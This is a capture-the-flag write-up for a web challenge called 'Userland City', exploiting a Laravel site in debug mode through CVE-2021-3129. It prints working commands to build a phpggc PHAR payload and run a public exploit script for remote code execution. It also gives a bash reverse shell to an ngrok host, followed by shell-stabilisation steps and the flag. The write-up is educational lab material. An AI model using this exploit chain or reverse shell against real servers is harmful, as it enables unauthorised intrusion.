<- WEB

Userland City

3 minutes to read

We are provided with this webpage:

Userland City 1

Enumeration

It shows a login form. Fortunately, we are given credentials in the challenge description: lxkid02:8rsNN9ohfLp69cVRFEgk4Qzs. Hence, we can use them to access:

Userland City 2

It is a simple web page for some fake online store for cybercriminals.

The description of the challenge is quite long. The important things are the already used credentials and that it uses Laravel with debug mode activated.

Finding a CVE

There is a known exploit for Laravel when debug is on: CVE-2021-3129. There is a Python script that will trigger Remote Code Execution (RCE) on the server: laravel-exploits.

The only thing we must do is craft a PHAR file with the command we want to execute. First, we need to clone another repository to have phpggc:

$ git clone https://github.com/ambionics/phpggc

$ git clone https://github.com/ambionics/laravel-exploits

Laravel exploitation

As a proof of concept, let’s try to execute the command id:

$ php -d'phar.readonly=0' ./phpggc/phpggc --phar phar --fast-destruct -o ./exploit.phar monolog/rce1 system id  

$ python3 laravel-exploits/laravel-ignition-rce.py http://188.166.172.138:30742 ./exploit.phar
+ Log file: /www/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !
+ Phar deserialized
--------------------------
uid=0(root) gid=0(root) groups=0(root)
--------------------------
+ Logs cleared

Alright, it worked. At this point, we could search the flag. But it will be better to gain a reverse shell on the system. For this purpose, we need to expose our listening port to the Internet with ngrok:

$ ngrok tcp 4444
ngrok

Session Status                online
Account                       Rocky (Plan: Free)
Version                       3.0.3
Region                        United States (us)
Latency                       126.434333ms
Web Interface                 http://127.0.0.1:4040
Forwarding                    tcp://2.tcp.ngrok.io:16210 -> localhost:4444

Connections                   ttl     opn     rt1     rt5     p50     p90
                              1       0       0.00    0.00    373.56  373.56

Now we generate the PHAR file with the reverse shell command and send it:

$ php -d'phar.readonly=0' ./phpggc/phpggc --phar phar --fast-destruct -o ./exploit.phar monolog/rce1 system "bash -c 'bash -i >& /dev/tcp/2.tcp.ngrok.io/16210 0>&1'"  

$ python3 laravel-exploits/laravel-ignition-rce.py http://188.166.172.138:30742 ./exploit.phar
+ Log file: /www/storage/logs/laravel.log
+ Logs cleared
+ Successfully converted to PHAR !

Flag

And we receive the connection, so we can find the flag easily and capture it:

$ nc -nlvp 4444
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from ::1.
Ncat: Connection from ::1:64517.
bash: cannot set terminal process group (57): Inappropriate ioctl for device
bash: no job control in this shell
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/www/public$ cd /
cd /
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ script /dev/null -c bash
script /dev/null -c bash
Script started, file is /dev/null
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ ^Z
zsh: suspended  ncat -nlvp 4444

$ stty raw -echo; fg
[1]  + continued  ncat -nlvp 4444
                                 reset xterm
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ export TERM=xterm
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ export SHELL=bash
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ stty rows 50 columns 158
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ ls
bin  boot  dev	entrypoint.sh  etc  flagdUsTi  home  lib  lib64  media	mnt  opt  proc	root  run  sbin  srv  sys  tmp	usr  var  www  
www@webuserlandcitymp-532274-8547f966cb-8w7ms:/$ cat /flag*
HTB{c4nt_p0p_th3s3_ch41n5!}